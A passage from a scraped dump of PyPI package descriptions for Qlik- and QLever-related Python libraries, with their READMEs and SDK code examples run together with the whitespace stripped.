theirref_parent.Installationpipinstallqlet"} +{"package": "qlever", "pacakge-description": "QLever ControlThis is a very small repository. Its main contents is a scriptqleverthat can control everything that QLever does. The script is supposed to be very\neasy to use and pretty much self-explanatory as you use it. If you use docker, you\ndon't even have to download any QLever code (docker will pull anything it needs)\nand the script is all you need.Directory structureWe recommend that you have a directory \"qlever\" for all things QLever on your machine,\nwith subdirectories for the different components, in particular: \"qlever-control\" (this\nrepository), \"qlever-indices\" (with a subfolder for each of your datasets), and \"qlever-code\"\n(only needed if you don't want to use docker, but compile the binaries on your machine).QuickstartCreate an empty directory (preferably as a subdirectory of \"qlever-indices\", go there,\nand call theqleverscript once with its full path and a dot and a space preceding it,\nand the name of a preconfiguration as only argument. For example:. /path/to/qlever olympicsThis will create aQleverfilepreconfigured for the120 Years of Olympicsdataset, which is\na great dataset to get started because it's small. Other options are:scientists(another small test collection),dblp(larger),wikidata(very large),\nand more. If you leave out the argument, you get a defaultQleverfile, which you need\nto edit first to use for your own dataset (it should be self-explanatory, after you have\nplayed around with and looked at one of the preconfigured Qleverfiles).Now you can callqleverwithout path and without a dot and a space preceding it and\nwith one or more actions as argument. To see the set of avaiable actions, just use the\nautocompletion. When you are a first-timer, execute these commands one after the other\n(without the comments):qlever get-data # Download the dataset\nqlever index # Build a QLever index for your data\nqlever start # Start a QLever server using that index\nqlever example-query # Launch an example queryEach command will not only execute the respective action, but it will also show you\nthe exact command line it uses. That way you can learn, on the side, how QLever works\ninternally. If you just want to know the command used for a particular action, but\nnot execute it, you can append \"show\" like this:qlever index showYou can also perform a sequence of actions with a single call, for example:qlever stop remove-index index startThere are many more actions. The script supports autocompletion. Just type \"qlever \"\nand then TAB and you will get a list of all the available actions."} +{"package": "qlib", "pacakge-description": "Initial package Qlib"} +{"package": "qlibs", "pacakge-description": "Welcome to QLibsQLibs is a multipurpose library, suitable for making graphical applications and games.FeaturesThere are quite a lot of them!Resource system.Math: vectors and matrices.Wavefont OBJ loading and rendering.Window creation and widgets.Text rendering.Network packets and sockets.More to come.DocumentationSeehttps://intquant.github.io/qlibs/Also there are examples.InstallationUsepip install qlibs[full]to install all dependencies.pip install qlibswill install only MIT-licensed dependencies.--no-depsswitch can be used to ignore dependencies, most of library will still work."} +{"package": "qlibs-cyan", "pacakge-description": "QLibs CyanReimplements some qlibs modules in C. Those are preferred by qlibs over their python counterparts."} +{"package": "qlib-tool", "pacakge-description": "No description available on PyPI."} +{"package": "qlient", "pacakge-description": "Qlient: Python GraphQL ClientA fast and modern graphql client designed with simplicity in mind.Key FeaturesCompatible with Python 3.7 and aboveBuild on top ofqlient-core,requestsandwebsocket-clientsupport for subscriptionsHelpSeedocumentationfor more details.If you want more information about the internals,\nI kindly refer you to theqlient-core documentation.If you are looking for an asynchronous implementation,\nI kindly refer you to theqlient-aiohttpsister project.InstallationpipinstallqlientQuick Startfromqlient.httpimportHTTPClient,GraphQLResponseclient=HTTPClient(\"https://swapi-graphql.netlify.app/.netlify/functions/index\")res:GraphQLResponse=client.query.film(# swapi graphql input fieldsid=\"ZmlsbXM6MQ==\",# qlient specific_fields=[\"id\",\"title\",\"episodeID\"])print(res.request.query)# query film($id: ID) { film(id: $id) { id title episodeID } }print(res.request.variables)# {'id': 'ZmlsbXM6MQ=='}print(res.data)# {'film': {'id': 'ZmlsbXM6MQ==', 'title': 'A New Hope', 'episodeID': 4}}"} +{"package": "qlient-aiohttp", "pacakge-description": "Qlient AIOHTTP: Python GraphQL ClientA blazingly fast and modern graphql client based on qlient-core and aiohttpKey FeaturesCompatible with Python 3.7 and aboveBuild on top ofqlient-coreandaiohttpsupport for subscriptionsHelpSee thedocumentationfor more details.Quick PreviewThis preview is using the officialgithub/graphql/swapi-graphqlgraphql api.importasynciofromqlient.aiohttpimportAIOHTTPClient,GraphQLResponseasyncdefmain():asyncwithAIOHTTPClient(\"https://swapi-graphql.netlify.app/.netlify/functions/index\")asclient:result:GraphQLResponse=awaitclient.query.film([\"title\",\"id\"],# fields selectionid=\"ZmlsbXM6MQ==\"# query arguments)print(result.request.query)print(result.data)asyncio.run(main())Which results in the following query being sent to the serverqueryfilm($id:ID){film(id:$id){titleid}}And returns the body below{\"film\":{\"title\":\"A New Hope\",\"id\":\"ZmlsbXM6MQ==\"}}"} +{"package": "qlient-core", "pacakge-description": "Qlient Core: Python GraphQL Client Core LibraryThis is the core for a blazingly fast and modern graphql client that was designed with simplicity in mind.HelpSee thedocumentationfor more details.Quick Previewfromqlient.coreimportClient,Backend,GraphQLResponseclassMyBackend(Backend):\"\"\"Must be implemented by you\"\"\"client=Client(MyBackend())res:GraphQLResponse=client.query.get_my_thing(\"name\")print(res.request.query)# \"query get_my_thing { get_my_thing { name } }\""} +{"package": "qlikconnect", "pacakge-description": "qlikconnectqlikconnect is the python library used to interact with Qliksense.It uses qlik engine API to connect with Qliksense through webocket. This module can be use to do things like fetch qlik charts data, evaluate your expression through this and many more.InstallationInstallation is pretty straightforward usingpip:pip install qlikconnectExampleAfter installing the library, importSenseConnectclass as below:ForLocalhost Qliksense Desktop :from qlikconnect import SenseConnect\nsc = SenseConnect()For **Enterprise **, certificate details will be required:from qlikconnect import SenseConnect\nsc = SenseConnect(domain ='domain_name',\n\t\t\t\tport='port_number',\n\t\t\t\tuserdirectory='userdirectory',\n\t\t\t\tuserid='userid',\n\t\t\t\tcertPath='folder/path/of/certificates')Certificates also required named 'root.pem', 'client.pem' and 'client_key.pem' which can be exported from qmc.Also you can get the port(4747 by default), userdirectory and userid from qmc.Use CaseTo get the app details :sc.get_list_of_apps(appID)To get last refreshed timestamp of an app :sc.get_last_updated_status(appname)To evaluate an expression from an app :sc.evaluate_expression(appname, expression,e_o_d=0)To export the data from charts to excel :sc.export_data(appname, chartname)Requirement> websocket_client\n> python 3 (3.6 recommended)"} +{"package": "qlikEngineConnect", "pacakge-description": "qlik-engine-api-connectorWeb-socket connector for Qlik engine API."} +{"package": "qlikflow", "pacakge-description": "qlikflowThis module allows you to create simple Apache Airflow DAG files-constructors for QlikView, Qlik Sense and NPrinting.Information filesChangelog :https://github.com/bintocher/qlikflow/blob/main/CHANGELOG.mdManual(en) :https://github.com/bintocher/qlikflow/blob/main/doc/readme.mdThis readme :https://github.com/bintocher/qlikflow/blob/main/README.mdInstallpip3installqlikflowUpgradepip3installqlikflow-UCreate config-fileOpenconfig_generator.pywith your IDE editor, and set settings, save scriptThen run script to createconfig.jsonfilePut thisconfig.jsonfile on your Apache Airflow server in folder:AIRFLOW_HOME/config/Use in DAG-filesfromairflowimportDAGfromairflow.utils.datesimportdays_agofromqlikflowimportqlikflowfromdatetimeimportdatetimetasksDict={u'qliksense. Test task':{'Soft':'qs1','TaskId':'c5d80e71-f574-4655-8874-3a6e2aed6218','RandomStartDelay':10,},u'np100. run nprinting tasks':{'Soft':'np100','TaskId':['taskid1','taskid2','taskid3','taskid4',],'Dep':{u'qliksense. Test task',}}}default_args={'owner':'test','depends_on_past':False,}dag=DAG(dag_id='_my_test_dag',default_args=default_args,start_date=days_ago(1),schedule_interval='@daily',description='Default test dag',tags=['qliksense','testing'],catchup=False)airflowTasksDict={}qlikflow.create_tasks(tasksDict,airflowTasksDict,dag)This code convert into DAG like this:"} +{"package": "qlik-sdk", "pacakge-description": "Qlik SDKQlik's Python SDK allows you to leverage the APIs of Qlik Cloud platform from the comfort of python.qlik-sdk-pythonInstallGetting startedAuthentication optionsAPI keysChangelogContributingBugsFeaturesDevelopingExamplesapps_items.pyflask_oauth.pyimport_export.pyrpc basics example_custom_type.pyrpc basics lists app_object_list app_object_list.pyrpc basics lists field_list field_list.pyrpc basics lists variable_list variable_list.pyrpc data hypercubes pivot hypercube_pivot.pyrpc data hypercubes stacked hypercube_stacked.pyrpc data hypercubes straight hypercube_straight.pyrpc rpc.pyInstallpython3-mpipinstall--upgradeqlik-sdkGetting startedThe lowest supported python version is3.8.\nA good place to start is ourexamples. Take a look and learn how to authorize and use our REST and RPC clients to access the APIs. If you're in a real hurry, the essence of our examples is shown below.fromqlik_sdkimportAuth,AuthType,Configapi_key=\"\"base_url=\"\"# E.g. https://foo.qlikcloud.eu.comq=Qlik(config=Config(host=base_url,auth_type=AuthType.APIKey,api_key=api_key))user=q.users.get_me()print(\"Logged in as: \"+user.name)# For REST calls: auth.rest# For RPC calls: auth.rpcAuthentication optionsAPI keysAn API key is a token representing a user in your tenant. Anyone may interact with the platform programmatically using the API key. The token contains the user context, respecting the access control privileges the user has in your tenant. More info can be found onQlik Dev Portal.For a step-by-step guide on how to get an API key for your tenant, check thistutorial.OAuth2OAuth is a standard security protocol for authorization and delegation. It allows third party applications to access API resources without disclosing the end-user credentials.For a step-by-step guide on how to create an OAuth client for your tenant, checkCreating and managing OAuth clients# Authorization# Create auth objectconfig=Config(host='my-tenant.qlikcloud.com',auth_type=AuthType.OAuth2,client_id='',client_secret='',redirect_url='',scope='',)auth=Auth(config=config)# for login redirect to authorization uri for OAuth exchange token flow# which will call callback endpoint with credentialsredirect(auth.generate_authorization_url(),code=301)# on callback endpoint (redirectUri), exachange the creadentials with tokenauth.authorize(request.full_path)# fetch a resourceuser=auth.rest(path=\"/users/me\")# refreshing tokenauth.refresh_token()# deauthorizationauth.deauthorize()Examplesapps_items.pyimportosimportuuidfromdataclassesimportasdictfromdotenvimportdotenv_valuesfromqlik_sdkimport(AppAttributes,AppUpdateAttributes,AuthType,Config,CreateApp,Qlik,UpdateApp,)# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)q=Qlik(config=config)user=q.users.get_me()print(\"Logged in as: \"+user.name)deflog_req(req):print(\"request:\",req.method,req.url)returnreqdeflog_res(res):print(\"response:\",res.request.method,res.request.url,\"->\",res.status_code)returnresq.apps.auth.rest.interceptors[\"response\"].use(log_res)q.apps.auth.rest.interceptors[\"request\"].use(log_req)# The body parameter can be either an object or a dict# The recommended way is to use an object# create apps - 2 methods - dict body or obj body# create app - dict bodyrandom_app_name1=str(uuid.uuid1())app_dict_body=q.apps.create(data={\"attributes\":{\"name\":random_app_name1}})app_dict_body.delete()# create app - obj bodyrandom_app_name2=str(uuid.uuid1())app=q.apps.create(data=CreateApp(attributes=AppAttributes(name=random_app_name2,description=\"desc\",spaceId=\"\")),)# Convert app object to dictapp_asdict=asdict(app)# set load script, reload and evaluate expressionwithapp.open():script=\"Load RecNo() as N autogenerate(200);\"app.set_script(script)app.do_reload()eval=app.evaluate(\"SUM([N])\")print(eval)# Set attribute# body: dictapp.set(data={\"attributes\":{\"name\":\"set-name-dict\"}})# body: objupdate_name=str(uuid.uuid1())app.set(UpdateApp(attributes=AppUpdateAttributes(description=\"new description\",name=update_name)))# items list - query param nameitems0=q.items.get_items(name=update_name)app.delete()items1=q.items.get_items(name=update_name)# get_items using an app name query param, result-length before and after deleteprint(f\"found items matching:{update_name}, before and after delete:{len(items0)},{len(items1)}\")items=q.items.get_items()first_100_item_names=[]foriteminitems.pagination:iflen(first_100_item_names)<100:first_100_item_names.append(item.name)else:breakflask_oauth.pyimportosimportrandomfromdotenvimportdotenv_valuesfromflaskimportFlask,redirect,render_template,request# src. should be removed when example is publicfromsrc.qlik_sdkimportAuth,AuthType,Config# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER_OAUTH\",False)client_id=env_values.get(\"CLIENT_ID_WEB\",False)client_secret=env_values.get(\"CLIENT_SECRET_WEB\",False)redirect_url=\"http://localhost:3000/login/callback\"config=Config(host=host,auth_type=AuthType.OAuth2,client_id=client_id,client_secret=client_secret,redirect_url=redirect_url,scope=[\"offline_access\"],)auth=Auth(config=config)app=Flask(__name__)template_data={\"is_logged_in\":False,\"user\":\"\",\"eval_result\":\"\"}@app.route(\"/\")defindex():try:user=auth.rest(path=\"/users/me\")user=user.json()template_data[\"is_logged_in\"]=Truetemplate_data[\"user\"]=f\"User:{user['name']}is logged in\"exceptException:template_data[\"is_logged_in\"]=Falsetemplate_data[\"user\"]=\"\"returnrender_template(\"index.html\",template_data=template_data)@app.route(\"/login\")deflogin():returnredirect(auth.generate_authorization_url(),code=301)@app.route(\"/login/callback\")defcallback():auth.authorize(request.full_path)returnredirect(\"/\",code=301)@app.route(\"/logout\")deflogout():auth.deauthorize()template_data[\"is_logged_in\"]=Falsetemplate_data[\"user\"]=\"\"returnredirect(\"/\",code=301)@app.route(\"/refresh\")defrefresh():auth.refresh_token()returnredirect(\"/\",code=301)@app.route(\"/websocket\")defwebsocket():random_id=random.randint(1,1000)app_id=f\"SessionApp_{random_id}\"try:# Open a websocket for a session app using RpcClientrpc_session=auth.rpc(app_id)try:rpc_session.open()app_handle=(rpc_session.send(\"GetActiveDoc\",-1))[\"qReturn\"][\"qHandle\"]rpc_session.send(\"SetScript\",app_handle,\"Load RecNo() as N autogenerate(10)\",)rpc_session.send(\"DoReload\",app_handle)eval_result=rpc_session.send(\"Evaluate\",app_handle,\"SUM([N])\")template_data[\"is_logged_in\"]=Truetemplate_data[\"eval_result\"]=eval_result[\"qReturn\"]exceptExceptionaserr:print(f\"rpc_session error occured:{err}\")returnredirect(\"/\",code=500)finally:rpc_session.close()print(\"rpc_connection closed\")exceptExceptionaserr:print(f\"error occured while setting up auth:{err}\")returnredirect(\"/\",code=500)returnredirect(\"/\",code=301)if__name__==\"__main__\":app.run(host=\"localhost\",port=3000,debug=True)import_export.pyimportjsonimportosimportshutilimportuuidfromdotenvimportdotenv_valuesfromqlik_sdkimportAuthType,Config,Qlik# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)withopen(os.path.join(file_dir,\"sheetListDef.json\"))asjson_file:sheet_list_def=json.load(json_file)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)q=Qlik(config=config)# Print user nameuser=q.users.get_me()print(\"Logged in as: \"+user.name)# Create a managed spacespace_name=\"publish-apps-sdk-test\"+str(uuid.uuid1())shared_space=q.spaces.create({\"name\":space_name,\"description\":\"space used for testing\",\"type\":\"managed\",})print(f\"created space with name{space_name}and id{shared_space.id}\")# Import app - (app with multiple sheets)qvf_file=os.path.join(file_dir,\"two-sheets.qvf\")app_name=\"import-test\"+str(uuid.uuid1())withopen(qvf_file,\"rb\")asqvf_data:imported_app=q.apps.import_app(data=qvf_data,name=app_name)print(f\"imported app with name{app_name}and id{imported_app.attributes.id}\")# Publish each sheetprint(f\"open app with id{imported_app.attributes.id}and publish all sheets\")withimported_app.open():session_obj=imported_app.create_session_object(sheet_list_def)sheet_list_layout=session_obj.get_layout()sheet_id_list=[q.qInfo.qIdforqinsheet_list_layout.qAppObjectList.qItems]forsheet_idinsheet_id_list:print(f\"publishing sheet with id{sheet_id}\")sheet_obj=imported_app.get_object(sheet_id)sheet_obj.publish()# Publish the appprint(f\"publish app with id{imported_app.attributes.id}to space with id{shared_space.id}\")published_app=imported_app.publish({\"spaceId\":shared_space.id})print(f\"published app id{published_app.attributes.id}\")# export applocal_filename=f\"exported{uuid.uuid1()}.qvf\"temp_contents_url=imported_app.export()# download app streaming to filewithq.auth.rest(path=temp_contents_url,method=\"get\",stream=True)asr:withopen(local_filename,\"wb\")asf:shutil.copyfileobj(r.raw,f)print(f\"Exported{published_app.attributes.name}to{local_filename}\")ext_file_path=env_values.get(\"EXTENSION_ZIP_PATH\",False)# Upload extensionwithopen(ext_file_path,\"rb\")asext_file:ext=q.extensions.create(file=ext_file)# TODO# set properties - change sheet name# upload theme# apply themes on the app# import datafiles# Delete everything createdprint(\"cleaning up\")ext.delete()imported_app.delete()published_app.delete()shared_space.delete()os.remove(local_filename)rpc basics example_custom_type.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromqlik_sdkimportApps,Auth,AuthType,Config# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)auth=Auth(config)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# create a generic object of a custom typeproperties={\"qInfo\":{\"qType\":\"custom-object\"},}obj=session_app.create_session_object(properties)# set a custom property i.e. a property not defined in GenericObjectPropertiesproperties[\"CustomProperty\"]=\"custom-property-value\"obj.set_properties(properties)# fetch the properties and validate that the custom property is returnednew_props=obj.get_properties()ifnew_props.qInfo.qType!=\"custom-object\":sys.exit(1)ifnew_props.CustomProperty!=\"custom-property-value\":sys.exit(1)rpc basics lists app_object_list app_object_list.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Config,GenericObjectPropertiesfromsrc.qlik_sdk.apis.AppsimportJsonObjectfromsrc.qlik_sdk.apis.QiximportAppObjectListDef,NxInfoclassCustomObjectProperties(GenericObjectProperties):meta:dict[str,str]=Nonedeflist_app_objects():# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.abspath(\"\")dotenv_path=os.path.join(file_dir+\"/examples\",\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():foriinrange(10):properties=CustomObjectProperties(qInfo=NxInfo(qType=\"my-object\"),meta=dict({\"title\":f\"my-object-{i}\"}),)session_app.create_object(properties)list_properties=GenericObjectProperties(qInfo=NxInfo(qType=\"my-list\"),qAppObjectListDef=AppObjectListDef(qType=\"my-object\",qData=JsonObject(title=\"/meta/title\")),)try:object=session_app.create_object(qProp=list_properties)layout=object.get_layout()returnlayout.qAppObjectList.qItems.__len__()exceptValueErrorase:print(e.__class__)iflist_app_objects()!=10:print(\"Error in number of objects .....\")sys.exit(1)rpc basics lists field_list field_list.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Config,GenericObjectPropertiesfromsrc.qlik_sdk.apis.QiximportFieldListDef,NxInfoscript=\"\"\"TempTable:LoadRecNo() as Field1,Rand() as Field2,Rand() as Field3AutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.abspath(\"\")dotenv_path=os.path.join(file_dir+\"/examples\",\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()# Create a field list using qFieldListDef and list all fields available in the document.object=session_app.create_session_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-field-list\"),qFieldListDef=FieldListDef(),))layout=object.get_layout()print(\"field-list \",layout.qFieldList.qItems)items=layout.qFieldList.qItemsif(items.__len__()!=3oritems[0].qName!=\"Field1\"oritems[1].qName!=\"Field2\"oritems[2].qName!=\"Field3\"):print(\"Error generated qFieldsLists ......\")sys.exit(1)rpc basics lists variable_list variable_list.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Config,GenericObjectPropertiesfromsrc.qlik_sdk.apis.AppsimportJsonObjectfromsrc.qlik_sdk.apis.QiximportNxInfo,VariableListDefscript=\"\"\"TempTable:LoadRecNo() as Field1,Rand() as Field2,Rand() as Field3AutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.abspath(\"\")dotenv_path=os.path.join(file_dir+\"/examples\",\".env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()session_app.create_variable_ex(GenericObjectProperties(qInfo=NxInfo(qType=\"variable\"),qComment=\"sample comment\",qDefinition=\"=Count(Field1)\",qName=\"vVariableName\",))variable=session_app.get_variable_by_id(\"vVariableName\")object=session_app.create_session_object(GenericObjectProperties(qInfo=NxInfo(qType=\"VariableList\"),qVariableListDef=VariableListDef(qType=\"variable\",qData=JsonObject(tags=\"/tags\"),qShowSession=True,qShowConfig=True,qShowReserved=True,),))layout=object.get_layout()layout.qVariableList.qItemsprint(\"variable-list: \",layout.qVariableList.qItems)foriteminlayout.qVariableList.qItems:ifitem.qName==\"vVariableName\":sys.exit(0)sys.exit(1)rpc data hypercubes pivot hypercube_pivot.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Configfromsrc.qlik_sdk.apis.Qiximport(GenericObjectProperties,HyperCubeDef,NxDimension,NxInfo,NxInlineDimensionDef,NxInlineMeasureDef,NxMeasure,NxPage,NxSelectionCell,)script=\"\"\"TempTable:LoadRecNo() as ID,RecNo()+1 as ID2,Rand() as ValueAutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env filefile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()obj=session_app.create_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-pivot-hypercube\"),qHyperCubeDef=HyperCubeDef(qDimensions=[NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID\"])),NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID2\"])),],qMeasures=[NxMeasure(qDef=NxInlineMeasureDef(qDef=\"Sum(Value)\",))],qMode=\"EQ_DATA_MODE_PIVOT\",qAlwaysFullyExpanded=True,),))data=obj.get_hyper_cube_pivot_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],)print(\"HyperCude object data: \",data)obj.select_pivot_cells(\"/qHyperCubeDef\",[NxSelectionCell(qType=\"D\",qRow=1,qCol=0)],False,False)data=obj.get_hyper_cube_pivot_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],)print(\"Hypercube data pages after selection: \",data)ifnot(len(data)==1andlen(data[0].qData)==1andlen(data[0].qTop)==1anddata[0].qTop[0].qText==\"Sum(Value)\"):print(\"Error in generated stack pages ......\")sys.exit(1)rpc data hypercubes stacked hypercube_stacked.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Configfromsrc.qlik_sdk.apis.Qiximport(GenericObjectProperties,HyperCubeDef,NxDimension,NxInfo,NxInlineDimensionDef,NxInlineMeasureDef,NxMeasure,NxPage,NxSelectionCell,)script=\"\"\"TempTable:LoadRecNo() as ID,RecNo()+1 as ID2,Rand() as ValueAutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env filefile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()obj=session_app.create_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-stacked-hypercube\",),qHyperCubeDef=HyperCubeDef(qDimensions=[NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID\"])),NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID2\"])),],qMeasures=[NxMeasure(qDef=NxInlineMeasureDef(qDef=\"Sum(Value)\",))],qMode=\"EQ_DATA_MODE_PIVOT_STACK\",qAlwaysFullyExpanded=True,),))data=obj.get_hyper_cube_stack_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],10000,)print(\"HyperCude stack data: \",data)obj.select_pivot_cells(\"/qHyperCubeDef\",[NxSelectionCell(qType=\"D\",qRow=1,qCol=0,)],False,False,)data=obj.get_hyper_cube_stack_data(\"/qHyperCubeDef\",[NxPage(qHeight=5,qLeft=0,qTop=0,qWidth=2,)],10000,)print(\"Hypercube stack data pages after selection: \",data)ifnot(len(data)==1andlen(data[0].qData)==1andlen(data[0].qData[0].qSubNodes)==1andlen(data[0].qData[0].qSubNodes[0].qSubNodes)==1):print(\"Error in generated stack pages ......\")sys.exit(1)rpc data hypercubes straight hypercube_straight.pyimportosimportsysimportuuidfromdotenvimportdotenv_valuesfromsrc.qlik_sdkimportApps,AuthType,Configfromsrc.qlik_sdk.apis.Qiximport(GenericObjectProperties,HyperCubeDef,NxDimension,NxInfo,NxInlineDimensionDef,NxInlineMeasureDef,NxMeasure,NxPage,)script=\"\"\"TempTable:LoadRecNo() as ID,Rand() as ValueAutoGenerate 100\"\"\"# get QCS_SERVER and QCS_API_KEY from .env filefile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../../../../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)config=Config(host=host,auth_type=AuthType.APIKey,api_key=api_key)apps=Apps(config)session_app_id=\"SessionApp_\"+str(uuid.uuid1())session_app=apps.create_session_app(session_app_id)withsession_app.open():# Load in some data into the session document:session_app.set_script(script)session_app.do_reload()obj=session_app.create_object(GenericObjectProperties(qInfo=NxInfo(qType=\"my-straight-hypercube\",),qHyperCubeDef=HyperCubeDef(qDimensions=[NxDimension(qDef=NxInlineDimensionDef(qFieldDefs=[\"ID\"]))],qMeasures=[NxMeasure(qDef=NxInlineMeasureDef(qDef=\"=Sum(Value)\",))],qInitialDataFetch=[NxPage(qHeight=5,qWidth=2)],),))layout=obj.get_layout()print(\"Hypercube data pages: \",layout)data=obj.select_hyper_cube_cells(\"/qHyperCubeDef\",[0,2,4],[0],False,False)print(\"After selection (notice the `qState` values)\")print(\"HyperCude object data: \",data)layout=obj.get_layout()print(layout)ifnot(len(layout.qHyperCube.qDimensionInfo[0].qGroupFieldDefs)==1andlayout.qHyperCube.qDimensionInfo[0].qGroupFieldDefs[0]==\"ID\"andlayout.qInfo.qType==\"my-straight-hypercube\"):print(\"Error in generated layout ......\")sys.exit(1)rpc rpc.pyimportosimportuuidfromdotenvimportdotenv_valuesfromqlik_sdkimportAuth,AuthType,Config,Qlikfromqlik_sdk.rpcimportRequestObject# get QCS_SERVER and QCS_API_KEY from .env file in the same folder as this scriptfile_dir=os.path.dirname(os.path.abspath(__file__))dotenv_path=os.path.join(file_dir,\"../.env\")ifnotos.path.exists(dotenv_path):print(\"Missing .env file: \"+dotenv_path)env_values=dotenv_values(dotenv_path=dotenv_path)host=env_values.get(\"QCS_SERVER\",False)api_key=env_values.get(\"QCS_API_KEY\",False)auth=Auth(Config(host=host,auth_type=AuthType.APIKey,api_key=api_key))q=Qlik(Config(host=host,auth_type=AuthType.APIKey,api_key=api_key))deflog_request_interceptor(request:RequestObject)->RequestObject:print(\"request: \"+str(request))returnrequestdeflog_qreturn_response_interceptor(response):if\"result\"inresponseand\"qReturn\"inresponse[\"result\"]:qreturn=str(response[\"result\"][\"qReturn\"])print(f\"qReturn:{qreturn}\")returnresponse# register 